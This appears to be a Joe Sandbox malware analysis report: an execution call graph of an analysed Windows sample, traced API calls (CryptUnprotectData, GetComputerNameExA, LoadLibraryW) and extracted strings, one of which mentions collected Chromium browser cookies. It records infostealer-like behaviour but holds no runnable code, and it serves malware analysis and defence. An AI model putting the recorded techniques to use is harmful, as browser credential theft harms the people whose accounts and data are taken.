                                                                              execution_graph 16492 fb39fc 16497 fa97d0 16492->16497 16494 fb3a09 16495 fa97d0 2 API calls 16494->16495 16496 fb3a1d 16495->16496 16498 fa9821 16497->16498 16499 fa97e5 16497->16499 16498->16494 16503 fd1cd0 16499->16503 16501 fa9895 16502 fd3b50 RtlAllocateHeap 16501->16502 16502->16498 16504 fd1d41 16503->16504 16505 fd1d82 RtlExpandEnvironmentStrings 16503->16505 16504->16505 16732 fc0a74 16733 fc0a88 16732->16733 16738 fc0aef 16732->16738 16734 fc0bcb 16733->16734 16736 fc0a94 16733->16736 16735 fd3b50 RtlAllocateHeap 16734->16735 16735->16738 16737 fd3b50 RtlAllocateHeap 16736->16737 16737->16738 16506 fba0f0 16507 fba0fe 16506->16507 16511 fba140 16506->16511 16512 fd3b50 16507->16512 16510 fba154 16510->16510 16515 fba200 16510->16515 16513 fd3be4 RtlAllocateHeap 16512->16513 16514 fd3ba6 16512->16514 16513->16510 16514->16513 16516 fba280 16515->16516 16517 fd3b50 RtlAllocateHeap 16516->16517 16518 fba300 16517->16518 16518->16518 16521 fd8d50 16518->16521 16520 fba371 16522 fd8d70 16521->16522 16523 fd3b50 RtlAllocateHeap 16522->16523 16524 fd8d90 16523->16524 16524->16524 16525 fd8ebe 16524->16525 16527 fd3cc0 16524->16527 16525->16520 16528 fd3ced LdrInitializeThunk 16527->16528 16529 fd3cf0 16527->16529 16528->16525 16529->16525 16739 fbe670 16740 fd93a0 LdrInitializeThunk 16739->16740 16741 fbe685 16740->16741 16530 fd09e9 16531 fd09ee 16530->16531 16532 fd3b50 RtlAllocateHeap 16531->16532 16533 fd09fc 16532->16533 16536 fd9000 16533->16536 16538 fd904d 16536->16538 16537 fd0a26 16539 fd3cc0 LdrInitializeThunk 16538->16539 16540 fd90ae 16538->16540 16539->16540 16540->16537 16541 fd3cc0 LdrInitializeThunk 16540->16541 16541->16537 16542 fbe5ec 16543 fbe5fc 16542->16543 16546 fd9500 16543->16546 16545 fbe618 16547 fd954d 16546->16547 16549 fd95ae 16547->16549 16550 fd3cc0 LdrInitializeThunk 16547->16550 16548 fd3b50 RtlAllocateHeap 16551 fd95eb 16548->16551 16549->16548 16553 fd969e 16549->16553 16550->16549 16552 fd3cc0 LdrInitializeThunk 16551->16552 16551->16553 16552->16553 16553->16545 16742 fb7160 16745 fd2010 16742->16745 16744 fb716d 16746 fd8ba0 2 API calls 16745->16746 16747 fd203d 16746->16747 16748 fd2390 16747->16748 16750 fd2244 16747->16750 16751 fd3b50 RtlAllocateHeap 16747->16751 16753 fd211e 16747->16753 16748->16744 16750->16748 16755 fd3cc0 LdrInitializeThunk 16750->16755 16756 fd2066 16751->16756 16753->16748 16753->16750 16758 fd4160 16753->16758 16762 fd4010 16753->16762 16766 fd4250 16753->16766 16755->16750 16756->16753 16757 fd3cc0 LdrInitializeThunk 16756->16757 16757->16753 16759 fd4176 16758->16759 16760 fd421e 16758->16760 16759->16760 16761 fd3cc0 LdrInitializeThunk 16759->16761 16760->16753 16761->16760 16763 fd4027 16762->16763 16764 fd412e 16762->16764 16763->16764 16765 fd3cc0 LdrInitializeThunk 16763->16765 16764->16753 16765->16764 16767 fd4458 16766->16767 16768 fd426b 16766->16768 16767->16753 16768->16767 16768->16768 16771 fd432e 16768->16771 16772 fd3cc0 LdrInitializeThunk 16768->16772 16769 fd442e 16769->16767 16770 fd4160 LdrInitializeThunk 16769->16770 16770->16767 16771->16769 16773 fd3cc0 LdrInitializeThunk 16771->16773 16772->16771 16773->16769 16774 fb8a66 16775 fb8a7b 16774->16775 16776 fd3b50 RtlAllocateHeap 16775->16776 16777 fb8c08 16776->16777 16778 fd8ba0 2 API calls 16777->16778 16779 fb8c6e 16778->16779 16554 fd59e2 16555 fd5a3c 16554->16555 16556 fd3cc0 LdrInitializeThunk 16555->16556 16557 fd5a9e 16555->16557 16556->16557 16780 fc2458 16781 fc2470 16780->16781 16781->16781 16782 fd3b50 RtlAllocateHeap 16781->16782 16783 fc255d 16782->16783 16783->16783 16784 fd8ba0 2 API calls 16783->16784 16785 fc260d 16784->16785 16567 fd1dd5 16570 fd8070 16567->16570 16569 fd1e03 GetVolumeInformationW 16571 fd6cd4 16572 fd6ce5 RtlAllocateHeap 16571->16572 16786 fb4d51 16787 fb4d57 16786->16787 16788 fd3b50 RtlAllocateHeap 16787->16788 16789 fb4e72 16788->16789 16789->16789 16790 fd8ba0 2 API calls 16789->16790 16791 fb4eed 16790->16791 16574 fcf4d3 16575 fcf4ff 16574->16575 16576 fd3b50 RtlAllocateHeap 16575->16576 16577 fcf5b1 16576->16577 16578 fd75cd 16579 fd760b 16578->16579 16580 fd764a RtlReAllocateHeap 16578->16580 16579->16580 16581 fd7724 16580->16581 16792 fbbf4a 16793 fbbf4f 16792->16793 16794 fd8ba0 2 API calls 16793->16794 16795 fbbfd6 16794->16795 16796 fb4848 16797 fb484e 16796->16797 16798 fb490e 16797->16798 16799 fd3cc0 LdrInitializeThunk 16797->16799 16800 fb4936 16799->16800 16582 fd57ca 16583 fd5810 16582->16583 16584 fd3cc0 LdrInitializeThunk 16583->16584 16585 fd586e 16583->16585 16584->16585 16586 fd3cc0 LdrInitializeThunk 16585->16586 16586->16585 16587 fb4bc0 16588 fd3b50 RtlAllocateHeap 16587->16588 16589 fb4bcd 16588->16589 16590 fd9000 LdrInitializeThunk 16589->16590 16591 fb4bdd 16590->16591 16592 fd3b50 RtlAllocateHeap 16591->16592 16593 fb4bed 16592->16593 16594 fd9000 LdrInitializeThunk 16593->16594 16595 fb4bff 16594->16595 16806 fd6041 16808 fd609d 16806->16808 16807 fd61aa LoadLibraryW 16807->16808 16808->16807 16808->16808 16809 fb3a3b 16810 fb3a4a 16809->16810 16835 fbd690 16810->16835 16812 fb3a50 16813 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16812->16813 16814 fb3a5a 16813->16814 16815 fbdf50 6 API calls 16814->16815 16816 fb3a6c 16815->16816 16817 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16816->16817 16818 fb3a76 16817->16818 16819 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16818->16819 16820 fb3a95 16819->16820 16821 fc0220 LdrInitializeThunk 16820->16821 16822 fb3aaa 16821->16822 16823 fc0ca0 RtlAllocateHeap LdrInitializeThunk 16822->16823 16824 fb3ab3 16823->16824 16825 fc1160 LdrInitializeThunk 16824->16825 16826 fb3abc 16825->16826 16827 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16826->16827 16828 fb3ac6 16827->16828 16829 fc1eb0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 16828->16829 16830 fb3adb 16829->16830 16831 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16830->16831 16832 fb3ae5 16831->16832 16833 fc3410 RtlAllocateHeap 16832->16833 16834 fb3afa 16833->16834 16836 fbd710 16835->16836 16837 fbd746 RtlExpandEnvironmentStrings 16835->16837 16836->16836 16836->16837 16838 fbd78b 16837->16838 16839 fd3b50 RtlAllocateHeap 16838->16839 16840 fbd79b RtlExpandEnvironmentStrings 16839->16840 16841 fbd829 16840->16841 16842 fd3b50 RtlAllocateHeap 16841->16842 16843 fbd8c6 16842->16843 16843->16843 16844 fd8d50 2 API calls 16843->16844 16845 fbd937 16844->16845 16596 fcd6b9 KiUserCallbackDispatcher 16597 fcd6cc 16596->16597 16598 fb45b2 16599 fb45c0 16598->16599 16602 fd8ba0 16599->16602 16601 fb45fd 16603 fd8bc0 16602->16603 16604 fd3b50 RtlAllocateHeap 16603->16604 16605 fd8be0 16604->16605 16606 fd8d0e 16605->16606 16607 fd3cc0 LdrInitializeThunk 16605->16607 16606->16601 16607->16606 16608 fc04b7 16612 fc04e9 16608->16612 16609 fc0997 16610 fd9500 RtlAllocateHeap LdrInitializeThunk 16610->16612 16612->16609 16612->16610 16612->16612 16614 fc089e 16612->16614 16615 fc0510 16612->16615 16617 fc07b5 16612->16617 16621 fd93a0 16612->16621 16625 fd9e50 16612->16625 16618 fd3cc0 LdrInitializeThunk 16614->16618 16616 fc05d2 16615->16616 16619 fd3cc0 LdrInitializeThunk 16615->16619 16617->16614 16620 fd3cc0 LdrInitializeThunk 16617->16620 16618->16609 16619->16616 16620->16614 16623 fd93c0 16621->16623 16622 fd94ce 16622->16612 16623->16622 16624 fd3cc0 LdrInitializeThunk 16623->16624 16624->16622 16627 fd9e70 16625->16627 16626 fd9f3e 16628 fd3b50 RtlAllocateHeap 16626->16628 16632 fda032 16626->16632 16627->16626 16629 fd3cc0 LdrInitializeThunk 16627->16629 16630 fd9f7d 16628->16630 16629->16626 16631 fd3cc0 LdrInitializeThunk 16630->16631 16630->16632 16631->16632 16632->16612 16850 fb6735 16851 fb676d 16850->16851 16852 fd3b50 RtlAllocateHeap 16851->16852 16853 fb6acd 16852->16853 16853->16853 16854 fbe434 16855 fbe3d0 16854->16855 16856 fbe437 16854->16856 16857 fd93a0 LdrInitializeThunk 16855->16857 16858 fbe416 16857->16858 16633 fb46a3 16634 fd3b50 RtlAllocateHeap 16633->16634 16635 fb46ad 16634->16635 16636 fd9000 LdrInitializeThunk 16635->16636 16637 fb46bf 16636->16637 16638 fb62a2 16641 fb7280 16638->16641 16642 fb7340 16641->16642 16643 fd3b50 RtlAllocateHeap 16642->16643 16644 fb743e 16643->16644 16645 fd3b50 RtlAllocateHeap 16644->16645 16646 fb764c 16645->16646 16647 fb06a0 16648 fb06af 16647->16648 16653 fb7810 16648->16653 16650 fb06c0 16651 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16650->16651 16652 fb06ca 16651->16652 16654 fb7830 16653->16654 16654->16654 16655 fb783b RtlExpandEnvironmentStrings 16654->16655 16656 fb785c 16655->16656 16657 fd3b50 RtlAllocateHeap 16656->16657 16658 fb786b RtlExpandEnvironmentStrings 16657->16658 16659 fd8d50 2 API calls 16658->16659 16660 fb788f 16659->16660 16664 fb5999 16665 fb59a8 16664->16665 16666 fd3b50 RtlAllocateHeap 16665->16666 16668 fb5ad6 16666->16668 16667 fb5ce9 CryptUnprotectData 16668->16667 16859 fd5f1f 16860 fd5f2a 16859->16860 16861 fd6000 LoadLibraryW 16860->16861 16862 fd6007 16861->16862 16863 fb1d1c 16864 fb1d2b 16863->16864 16869 fb4950 16864->16869 16866 fb1d3e 16867 fa97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16866->16867 16868 fb1d48 16867->16868 16870 fb4970 16869->16870 16870->16870 16871 fb497a RtlExpandEnvironmentStrings 16870->16871 16872 fb49ae 16871->16872 16873 fd3b50 RtlAllocateHeap 16872->16873 16874 fb49be RtlExpandEnvironmentStrings 16873->16874 16875 fb4a4e 16874->16875 16876 fd3b50 RtlAllocateHeap 16875->16876 16877 fb4ad7 16876->16877 16877->16877 16878 fd8ba0 2 API calls 16877->16878 16879 fb4b5a 16878->16879 16669 fb5890 16670 fd8d50 2 API calls 16669->16670 16671 fb5897 16670->16671 16672 fd8d50 2 API calls 16671->16672 16673 fb58a1 16672->16673 16674 fbc390 16675 fbc395 16674->16675 16679 fbc540 16675->16679 16695 fbfe80 16675->16695 16676 fbc3bf 16680 fbc556 16679->16680 16687 fbc610 16679->16687 16681 fd3b50 RtlAllocateHeap 16680->16681 16680->16687 16682 fbc682 16681->16682 16682->16682 16683 fd8ba0 2 API calls 16682->16683 16684 fbc6fd 16683->16684 16685 fd3b50 RtlAllocateHeap 16684->16685 16684->16687 16686 fbc70d 16685->16686 16688 fd9000 LdrInitializeThunk 16686->16688 16687->16676 16689 fbc71f 16688->16689 16690 fd3b50 RtlAllocateHeap 16689->16690 16691 fbc765 16689->16691 16692 fbc77a 16690->16692 16691->16687 16693 fd3cc0 LdrInitializeThunk 16691->16693 16692->16692 16699 fa8d90 16692->16699 16693->16687 16696 fbfe99 16695->16696 16698 fc0000 16695->16698 16697 fd3b50 RtlAllocateHeap 16696->16697 16697->16698 16698->16676 16700 fa8eb6 16699->16700 16702 fa8db0 16699->16702 16701 fd3b50 RtlAllocateHeap 16700->16701 16704 fa8dfa 16701->16704 16703 fd3b50 RtlAllocateHeap 16702->16703 16703->16704 16704->16691 16709 fd1690 16710 fd8ba0 2 API calls 16709->16710 16711 fd16c0 16710->16711 16884 fb3c09 16885 fb3c15 16884->16885 16886 fa97d0 2 API calls 16885->16886 16887 fb3c23 16886->16887 16712 fc4f8f 16714 fc4f96 16712->16714 16713 fd1cd0 RtlExpandEnvironmentStrings 16715 fc506a 16713->16715 16714->16713 16714->16714 16716 fc50b5 GetPhysicallyInstalledSystemMemory 16715->16716 16717 fc50da 16716->16717 16888 fd6209 16889 fd627c LoadLibraryW 16888->16889 16718 fc7f84 16719 fc801a 16718->16719 16720 fc8071 SysAllocString 16719->16720 16721 fc80cd 16720->16721 16722 fc4087 16723 fc4091 16722->16723 16723->16723 16724 fc44fe GetComputerNameExA 16723->16724 16725 fc456d GetComputerNameExA 16724->16725 16727 fc467b 16725->16727 16891 fbc900 16892 fbc90b 16891->16892 16896 fbc95f 16891->16896 16893 fd3b50 RtlAllocateHeap 16892->16893 16894 fbc96e 16893->16894 16895 fd3b50 RtlAllocateHeap 16894->16895 16895->16896 16728 fb5087 16730 fb5090 16728->16730 16729 fb516e 16730->16729 16731 fd3cc0 LdrInitializeThunk 16730->16731 16731->16729 16897 ffda02 16898 ffda0d __DllMainCRTStartup@12 16897->16898 16901 ffd90c 16898->16901 16900 ffda20 16902 ffd918 __msize 16901->16902 16903 ffd9b5 __msize 16902->16903 16907 ffd965 16902->16907 16909 ffd7d7 16902->16909 16903->16900 16905 ffd995 16905->16903 16906 ffd7d7 ___DllMainCRTStartup 17 API calls 16905->16906 16906->16903 16907->16903 16907->16905 16908 ffd7d7 ___DllMainCRTStartup 17 API calls 16907->16908 16908->16905 16910 ffd7e6 ___DllMainCRTStartup 16909->16910 16911 ffd862 16909->16911 16931 ffd7f1 16910->16931 16940 ffeef8 16910->16940 16912 ffd899 16911->16912 16916 ffd868 16911->16916 16913 ffd89e 16912->16913 16914 ffd8f7 16912->16914 16963 ffeb70 TlsGetValue 16913->16963 16914->16931 16990 ffee8a 16914->16990 16917 ffd883 16916->16917 16916->16931 16950 10015e2 16916->16950 16917->16931 16953 1001893 16917->16953 16924 ffd7fd 16933 ffd808 __RTC_Initialize ___DllMainCRTStartup 16924->16933 16945 1001dc7 16924->16945 16926 ffd88d 16957 ffeba4 16926->16957 16930 ffd892 16932 1001dc7 ___DllMainCRTStartup HeapFree 16930->16932 16931->16907 16932->16931 16933->16907 16934 ffd8cd 16935 ffd8eb 16934->16935 16936 ffd8d4 16934->16936 16982 ffdfe4 16935->16982 16976 ffebe1 16936->16976 16939 ffd8db 16939->16907 16941 ffef08 ___DllMainCRTStartup __initp_misc_cfltcvt_tab 16940->16941 16942 ffef1d ___DllMainCRTStartup 16941->16942 16943 ffeba4 __mtterm 3 API calls 16941->16943 16942->16924 16944 fff080 16943->16944 16944->16924 16946 1001dd0 16945->16946 16947 1001e27 16945->16947 16948 1001de2 16946->16948 16949 1001e15 HeapFree 16946->16949 16947->16931 16948->16931 16949->16947 17001 10014a0 16950->17001 16952 10015ed 16952->16917 16954 100189c 16953->16954 16955 ffdfe4 __freea 7 API calls 16954->16955 16956 10018b0 16954->16956 16955->16954 16956->16926 16958 ffebae 16957->16958 16961 ffebba 16957->16961 16959 ffeaf5 __amsg_exit 2 API calls 16958->16959 16959->16961 16960 ffebce TlsFree 16962 ffebdc 16960->16962 16961->16960 16961->16962 16962->16930 16964 ffeb85 16963->16964 16965 ffd8a3 16963->16965 16966 ffeaf5 __amsg_exit 2 API calls 16964->16966 16968 1001292 16965->16968 16967 ffeb90 TlsSetValue 16966->16967 16967->16965 16970 100129b 16968->16970 16971 ffd8af 16970->16971 17096 1005fe9 16970->17096 16971->16931 16972 ffeaf5 TlsGetValue 16971->16972 16973 ffeb0d 16972->16973 16975 ffeb22 __initp_misc_cfltcvt_tab 16972->16975 16974 ffeb17 TlsGetValue 16973->16974 16973->16975 16974->16975 16975->16934 16978 ffebed __msize __initp_misc_cfltcvt_tab 16976->16978 16977 100334e __msize 7 API calls 16979 ffec5e ___DllMainCRTStartup 16977->16979 16978->16977 16980 100334e __msize 7 API calls 16979->16980 16981 ffec7f __msize ___DllMainCRTStartup _LocaleUpdate::_LocaleUpdate 16980->16981 16981->16939 16983 ffdff0 __msize 16982->16983 16985 100334e __msize 6 API calls 16983->16985 16986 ffe056 __dosmaperr __msize 16983->16986 16988 ffe021 __freea 16983->16988 16984 ffe044 HeapFree 16984->16986 16987 ffe007 ___sbh_find_block 16985->16987 16986->16931 16987->16988 17106 10033b1 16987->17106 16988->16984 16988->16986 16991 ffee98 16990->16991 16992 ffeee3 16990->16992 16993 ffee9e TlsGetValue 16991->16993 16999 ffeec1 16991->16999 16994 ffeeed TlsSetValue 16992->16994 16995 ffeef6 16992->16995 16996 ffeeb1 TlsGetValue 16993->16996 16993->16999 16994->16995 16995->16931 16996->16999 16997 ffeaf5 __amsg_exit 2 API calls 16998 ffeed8 16997->16998 17115 ffed5b 16998->17115 16999->16997 17002 10014ac __msize 17001->17002 17012 100334e 17002->17012 17004 10014b3 17005 ffeaf5 __amsg_exit 2 API calls 17004->17005 17007 100156c _doexit __msize _malloc __initterm 17004->17007 17006 10014ea 17005->17006 17006->17007 17008 ffeaf5 __amsg_exit 2 API calls 17006->17008 17007->16952 17011 10014ff 17008->17011 17009 ffeaf5 TlsGetValue TlsGetValue __amsg_exit 17009->17011 17010 ffeaec TlsGetValue TlsGetValue _doexit 17010->17011 17011->17007 17011->17009 17011->17010 17013 1003363 17012->17013 17017 1003375 17012->17017 17018 100328b 17013->17018 17015 1003369 17015->17017 17033 100135c 17015->17033 17017->17004 17019 1003297 __msize 17018->17019 17020 10032b3 _malloc 17019->17020 17040 100465d 17019->17040 17026 10032cd __msize __mtinitlocknum 17020->17026 17058 100124d 17020->17058 17026->17015 17027 100334e __msize 7 API calls 17028 10032f5 17027->17028 17029 1003329 17028->17029 17031 10032fd __mtinitlocknum 17028->17031 17030 ffdfe4 __freea 7 API calls 17029->17030 17030->17026 17031->17026 17032 ffdfe4 __freea 7 API calls 17031->17032 17032->17026 17034 100465d __FF_MSGBANNER 2 API calls 17033->17034 17035 1001366 17034->17035 17036 10044b2 __NMSG_WRITE 2 API calls 17035->17036 17037 100136e 17036->17037 17038 ffeaf5 __amsg_exit 2 API calls 17037->17038 17039 1001379 17038->17039 17039->17017 17062 1006904 17040->17062 17043 1004671 17045 10044b2 __NMSG_WRITE 2 API calls 17043->17045 17048 10032ac 17043->17048 17044 1006904 __set_error_mode 2 API calls 17044->17043 17046 1004689 17045->17046 17047 10044b2 __NMSG_WRITE 2 API calls 17046->17047 17047->17048 17049 10044b2 17048->17049 17050 10044c6 17049->17050 17051 1006904 __set_error_mode 2 API calls 17050->17051 17053 1004626 17050->17053 17052 10044e8 17051->17052 17052->17053 17054 1006904 __set_error_mode 2 API calls 17052->17054 17053->17020 17055 10044f9 17054->17055 17055->17053 17069 ffd07c 17055->17069 17057 100452d __invoke_watson 17057->17020 17060 1001256 17058->17060 17061 100128c 17060->17061 17073 fff4af 17060->17073 17061->17026 17061->17027 17064 1006913 __msize 17062->17064 17063 1004664 17063->17043 17063->17044 17064->17063 17066 fff271 17064->17066 17067 ffeaf5 __amsg_exit 2 API calls 17066->17067 17068 fff281 __invoke_watson 17067->17068 17070 ffd08d __msize 17069->17070 17071 fff271 __msize 2 API calls 17070->17071 17072 ffd0a8 17070->17072 17071->17072 17072->17057 17074 fff562 17073->17074 17080 fff4c1 _malloc 17073->17080 17075 fff588 __calloc_impl 2 API calls 17074->17075 17082 fff54e __msize 17075->17082 17076 100465d __FF_MSGBANNER 2 API calls 17076->17080 17078 10044b2 __NMSG_WRITE 2 API calls 17078->17080 17079 fff51e RtlAllocateHeap 17079->17080 17080->17076 17080->17078 17080->17079 17080->17082 17083 fff460 17080->17083 17089 fff588 17080->17089 17082->17060 17084 fff46c __msize 17083->17084 17085 fff48d __msize _malloc 17084->17085 17086 100334e __msize 7 API calls 17084->17086 17085->17080 17087 fff482 17086->17087 17092 1003b60 17087->17092 17090 ffeaf5 __amsg_exit 2 API calls 17089->17090 17091 fff598 17090->17091 17091->17080 17093 1003b8e 17092->17093 17094 10036c7 ___sbh_alloc_block RtlAllocateHeap 17093->17094 17095 1003c27 ___sbh_alloc_block 17093->17095 17094->17095 17095->17085 17097 1005ff5 __msize 17096->17097 17098 100600d __msize 17097->17098 17105 100602c _memset __calloc_impl 17097->17105 17099 fff271 __msize 2 API calls 17098->17099 17102 1006022 __msize 17099->17102 17100 100609e RtlAllocateHeap 17100->17105 17101 100334e __msize 7 API calls 17101->17105 17102->16970 17103 fff588 __calloc_impl 2 API calls 17103->17105 17104 1003b60 ___sbh_alloc_block RtlAllocateHeap 17104->17105 17105->17100 17105->17101 17105->17102 17105->17103 17105->17104 17107 10033f0 17106->17107 17110 1003692 17106->17110 17108 1003657 HeapFree 17107->17108 17107->17110 17111 1002060 17108->17111 17110->16988 17112 1002078 17111->17112 17113 10020a7 17112->17113 17114 100209f __VEC_memcpy 17112->17114 17113->17110 17114->17113 17117 ffed67 __msize 17115->17117 17116 ffee69 __msize 17116->16992 17117->17116 17118 ffed7f 17117->17118 17119 ffdfe4 __freea 7 API calls 17117->17119 17120 ffed8d 17118->17120 17121 ffdfe4 __freea 7 API calls 17118->17121 17119->17118 17122 ffed9b 17120->17122 17123 ffdfe4 __freea 7 API calls 17120->17123 17121->17120 17124 ffeda9 17122->17124 17125 ffdfe4 __freea 7 API calls 17122->17125 17123->17122 17126 ffedb7 17124->17126 17127 ffdfe4 __freea 7 API calls 17124->17127 17125->17124 17128 ffedc5 17126->17128 17129 ffdfe4 __freea 7 API calls 17126->17129 17127->17126 17130 ffedd3 17128->17130 17131 ffdfe4 __freea 7 API calls 17128->17131 17129->17128 17132 ffede4 17130->17132 17133 ffdfe4 __freea 7 API calls 17130->17133 17131->17130 17134 100334e __msize 7 API calls 17132->17134 17133->17132 17136 ffedec __freefls@4 17134->17136 17135 ffedf8 17135->16992 17136->17135 17137 100334e __msize 7 API calls 17136->17137 17140 ffee25 __freefls@4 17137->17140 17138 ffee56 __freefls@4 17139 ffdfe4 __freea 7 API calls 17138->17139 17139->17116 17140->17138 17142 ffe755 17140->17142 17143 ffe7d9 17142->17143 17144 ffe76c 17142->17144 17145 ffe826 17143->17145 17146 ffdfe4 __freea 7 API calls 17143->17146 17144->17143 17150 ffe7a0 17144->17150 17155 ffdfe4 __freea 7 API calls 17144->17155 17161 ffe84d 17145->17161 17196 1004041 17145->17196 17148 ffe7fa 17146->17148 17152 ffdfe4 __freea 7 API calls 17148->17152 17151 ffe7c1 17150->17151 17162 ffdfe4 __freea 7 API calls 17150->17162 17153 ffdfe4 __freea 7 API calls 17151->17153 17157 ffe80d 17152->17157 17158 ffe7ce 17153->17158 17154 ffe892 17159 ffdfe4 __freea 7 API calls 17154->17159 17160 ffe795 17155->17160 17156 ffdfe4 __freea 7 API calls 17156->17161 17164 ffdfe4 __freea 7 API calls 17157->17164 17165 ffdfe4 __freea 7 API calls 17158->17165 17166 ffe898 17159->17166 17172 100421b 17160->17172 17161->17154 17163 ffdfe4 7 API calls __freea 17161->17163 17168 ffe7b6 17162->17168 17163->17161 17169 ffe81b 17164->17169 17165->17143 17166->17138 17188 10041d6 17168->17188 17171 ffdfe4 __freea 7 API calls 17169->17171 17171->17145 17173 1004228 17172->17173 17187 10042a5 17172->17187 17174 1004239 17173->17174 17175 ffdfe4 __freea 7 API calls 17173->17175 17176 100424b 17174->17176 17178 ffdfe4 __freea 7 API calls 17174->17178 17175->17174 17177 100425d 17176->17177 17179 ffdfe4 __freea 7 API calls 17176->17179 17180 100426f 17177->17180 17181 ffdfe4 __freea 7 API calls 17177->17181 17178->17176 17179->17177 17182 1004281 17180->17182 17183 ffdfe4 __freea 7 API calls 17180->17183 17181->17180 17184 ffdfe4 __freea 7 API calls 17182->17184 17186 1004293 17182->17186 17183->17182 17184->17186 17185 ffdfe4 __freea 7 API calls 17185->17187 17186->17185 17186->17187 17187->17150 17189 10041e3 17188->17189 17195 1004217 17188->17195 17190 10041f3 17189->17190 17191 ffdfe4 __freea 7 API calls 17189->17191 17192 ffdfe4 __freea 7 API calls 17190->17192 17193 1004205 17190->17193 17191->17190 17192->17193 17194 ffdfe4 __freea 7 API calls 17193->17194 17193->17195 17194->17195 17195->17151 17197 1004052 17196->17197 17198 ffe846 17196->17198 17199 ffdfe4 __freea 7 API calls 17197->17199 17198->17156 17200 100405a 17199->17200 17201 ffdfe4 __freea 7 API calls 17200->17201 17202 1004062 17201->17202 17203 ffdfe4 __freea 7 API calls 17202->17203 17204 100406a 17203->17204 17205 ffdfe4 __freea 7 API calls 17204->17205 17206 1004072 17205->17206 17207 ffdfe4 __freea 7 API calls 17206->17207 17208 100407a 17207->17208 17209 ffdfe4 __freea 7 API calls 17208->17209 17210 1004082 17209->17210 17211 ffdfe4 __freea 7 API calls 17210->17211 17212 1004089 17211->17212 17213 ffdfe4 __freea 7 API calls 17212->17213 17214 1004091 17213->17214 17215 ffdfe4 __freea 7 API calls 17214->17215 17216 1004099 17215->17216 17217 ffdfe4 __freea 7 API calls 17216->17217 17218 10040a1 17217->17218 17219 ffdfe4 __freea 7 API calls 17218->17219 17220 10040a9 17219->17220 17221 ffdfe4 __freea 7 API calls 17220->17221 17222 10040b1 17221->17222 17223 ffdfe4 __freea 7 API calls 17222->17223 17224 10040b9 17223->17224 17225 ffdfe4 __freea 7 API calls 17224->17225 17226 10040c1 17225->17226 17227 ffdfe4 __freea 7 API calls 17226->17227 17228 10040c9 17227->17228 17229 ffdfe4 __freea 7 API calls 17228->17229 17230 10040d1 17229->17230 17231 ffdfe4 __freea 7 API calls 17230->17231 17232 10040dc 17231->17232 17233 ffdfe4 __freea 7 API calls 17232->17233 17234 10040e4 17233->17234 17235 ffdfe4 __freea 7 API calls 17234->17235 17236 10040ec 17235->17236 17237 ffdfe4 __freea 7 API calls 17236->17237 17238 10040f4 17237->17238 17239 ffdfe4 __freea 7 API calls 17238->17239 17240 10040fc 17239->17240 17241 ffdfe4 __freea 7 API calls 17240->17241 17242 1004104 17241->17242 17243 ffdfe4 __freea 7 API calls 17242->17243 17244 100410c 17243->17244 17245 ffdfe4 __freea 7 API calls 17244->17245 17246 1004114 17245->17246 17247 ffdfe4 __freea 7 API calls 17246->17247 17248 100411c 17247->17248 17249 ffdfe4 __freea 7 API calls 17248->17249 17250 1004124 17249->17250 17251 ffdfe4 __freea 7 API calls 17250->17251 17252 100412c 17251->17252 17253 ffdfe4 __freea 7 API calls 17252->17253 17254 1004134 17253->17254 17255 ffdfe4 __freea 7 API calls 17254->17255 17256 100413c 17255->17256 17257 ffdfe4 __freea 7 API calls 17256->17257 17258 1004144 17257->17258 17259 ffdfe4 __freea 7 API calls 17258->17259 17260 100414c 17259->17260 17261 ffdfe4 __freea 7 API calls 17260->17261 17262 1004154 17261->17262 17263 ffdfe4 __freea 7 API calls 17262->17263 17264 1004162 17263->17264 17265 ffdfe4 __freea 7 API calls 17264->17265 17266 100416d 17265->17266 17267 ffdfe4 __freea 7 API calls 17266->17267 17268 1004178 17267->17268 17269 ffdfe4 __freea 7 API calls 17268->17269 17270 1004183 17269->17270 17271 ffdfe4 __freea 7 API calls 17270->17271 17272 100418e 17271->17272 17273 ffdfe4 __freea 7 API calls 17272->17273 17274 1004199 17273->17274 17275 ffdfe4 __freea 7 API calls 17274->17275 17276 10041a4 17275->17276 17277 ffdfe4 __freea 7 API calls 17276->17277 17278 10041af 17277->17278 17279 ffdfe4 __freea 7 API calls 17278->17279 17280 10041ba 17279->17280 17281 ffdfe4 __freea 7 API calls 17280->17281 17282 10041c5 17281->17282 17283 ffdfe4 __freea 7 API calls 17282->17283 17283->17198
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00FBD77D
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00FBD7A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: -^$AV$SE$X&$[info] collected cookies file of the chromium-based browser$onqp$onqp
                                                                              • API String ID: 237503144-3553015444
                                                                              • Opcode ID: bb4ecf429c7efec7b4fe574be1a7dfae409eda5ec1c1360cfda454b999cbf5fb
                                                                              • Instruction ID: 12446c1f821a492b401edbdf6d6ca7226b4bbaff008060ef33018fd5abc37217
